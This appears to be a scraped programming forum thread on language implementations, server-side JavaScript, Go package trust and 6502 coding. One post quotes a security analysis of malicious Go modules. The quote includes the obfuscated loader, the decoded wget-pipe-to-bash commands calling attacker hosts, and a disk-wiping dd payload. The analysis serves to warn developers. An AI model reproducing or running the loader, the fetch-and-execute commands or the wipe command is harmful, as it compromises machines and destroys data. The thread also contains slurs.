- Joined
- Jul 8, 2024
A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
This feels like a really bonkers claim.A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
im no genius but id assume it has something to do with everything looking like a nail. like for example, lets say youre a back end web dev who knows a lot of php. if php was able to do fromt end development (idk if it can ive never used php) chances are if you wanted more work you'd use it instead of learning something new wouldnt you?Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
Because then you'd be stuck with the quirks of whatever that one implementation does, which ossify into a sort of informal standard regardless of what the actual language standards (if they even exist) say. Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how rust only has one—the official). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
That's a cool vaguepost, but I'm dying to hear some specifics.Its now a veritable monstrosity of countless variables and functions twisting around each other across countless files and subfolders.
From what I've heard it was due to the language used early on by multiple pieces of malware, and thus the heuristics of the compilers being thrown into AV databases. Though it's still retardedIDK, what do you think happens if you build up a binary pattern signature database for 20 years and never remove anything?
I agree, it's just convenience or laziness or both. The logic is "hey, I know JS, I can write backend code in JS, guess I'll go with JS on the backend too."im no genius but id assume it has something to do with everything looking like a nail. like for example, lets say youre a back end web dev who knows a lot of php. if php was able to do fromt end development (idk if it can ive never used php) chances are if you wanted more work you'd use it instead of learning something new wouldnt you?
If this were actually true, we wouldn't still be in compatibility hell with compiled langs.Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.
Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
The overall reading comprehension ability in this thread is taking a sharp decline.Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
If everything is written in one language, you'll have an easier time maintaining and expanding the codebase later, because future developers won't need to know multiple languages. This is especially a benefit in JS because it's a very common language. I'd say you get type transparency between modules, but in practice, all this really means is native ingestion of JSON on both ends, which isn't all that special anymore.Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
This is a solved problem in the world of JS in the form of SSR, but I can certainly understand a preference not to hitch your wagon to any particular JS framework, as they're extremely heavy, committal, and fickle in the sense that future updates will invalidate your codebase in at most 5 years.[...] I use it for server side rendering for pages where JS fetch & render is too slow (or too late in page rendering process). For instance, for SEO purposes [...]
That's what all the docs tell me, but this is a server side component that was failing. If I used https://api/.... broken, if I added https://api to the local proxy and then used http://localhost/proxy/api then it worked. Maybe some weird glitch in one of the 2000 node packages this thing pulled in.Also, the CORS thing is a requirement for asynchronously calling an API from the browser. It has nothing to do with the server-side language at all
Searching for packages on https://pkg.go.dev can yield a minefield of random forks and shit. You can usually tell which are the main ones based on the "Imported by" count, but you could easily fake that by creating a shitload of dummy repos that import your malicious package. tbh I find most of the go packages I use from their github links in google/bing/wtf search results. Not sure what the best solution to this issue is, given the decentralized design of go's packaging system.In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:
Despite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket’s scanners flagged the suspicious behaviors, leading us to a deeper investigation.
- github[.]com/truthfulpharm/prototransform
- github[.]com/blankloggia/go-mcp
- github[.]com/steelpoor/tlsproxy
Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature where modules are directly imported from GitHub repositories creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to identify legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.
Obviously, any programmer worth his salt would see a function like that, do a 360, and find a different library, but they're relying on the fact hardly anyone reads the source of everything they import. TheAttackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here’s how one malicious module (truthfulpharm/prototransform) executed this trick:
C-like:func eGtROk() error { DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "} pBRPhsxN := runtime.GOOS == "linux" bcbGOM := "/bin/sh" vpqIU := "-c" PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44] if pBRPhsxN { exec.Command(bcbGOM, vpqIU, PWcf).Start() } return nil } var GEeEQNj = eGtROk()
Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.
Decoded Malicious Commands:
Bash:# prototransform module payload wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash & # go-mcp module payload wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash & # tlsproxy module payload wget -O - <http://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &
Decoded Intent:
- Fetches a destructive shell script (done.sh) from the attacker-controlled URL:
- https://vanartest[.]website/storage/de373d0df/a31546bf
- Executes it immediately, leaving virtually no time for response or recovery.
Similar URLs extracted from the other malicious modules (now offline):
- https://kaspamirror[.]icu/storage/de373d0df/a31546bf
- http://147.45.44[.]41/storage/de373d0df/ccd7b46d
Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:
done.sh – The destructive payload:
Bash:#!/bin/bash dd if=/dev/zero of=/dev/sda bs=1M conv=fsync sync
dd
command would need root to overwrite the device like that, but it's not all that unlikely given the widespread use of go-based stuff on servers. Though you don't get the same sort of damage if you're running through docker or similar. I'm not super worried by this, but I thought it was interesting nonetheless.Nice try, this is why I only use NVMe drives.dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
Thedd
command would need root to overwrite the device like that, but that's not super unlikely given the widespread use of go-based stuff on servers.
When C's syntax is so rigid that it allows for uncountably infinite variations of undefined behaviour.amen to that. Since i started using C and now most recently Java i feel id appreciate a like a language with the readability of python and the rigid syntax rules of C
GCC and LLVM are only separate because RMS is too fat and retarded to check his email. LLVM was offered to be donated to the GNU project, directly to RMS, but he simply didn't see the email. The differences between the compilers these days are pretty small, the same people work on both and port every new optimisation to both compilers.A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
I enjoy me some 6502 action. Unrolling loops to make things run smoothly is fun. I'm far from a real programmer tho.Real programmers use assembly~
recently i've taken the black man's approach of using a high level language for a 6502 machineI enjoy me some 6502 action. Unrolling loops to make things run smoothly is fun. I'm far from a real programmer tho.
That's actually very interesting and one can always inline asm stuff that really matters anyways, I'll have to try it out, cheers.recently i've taken the black man's approach of using a high level language for a 6502 machine
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much
The 6502 is markedly better for using HLLs on than its contemporaries like the 8080/Z80. 6502 ASM has often been compared to writing microcode directly due to it being so minimal to the point where the majority of programmers essentially build their own ad-hoc register file in the zero page.recently i've taken the black man's approach of using a high level language for a 6502 machine
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much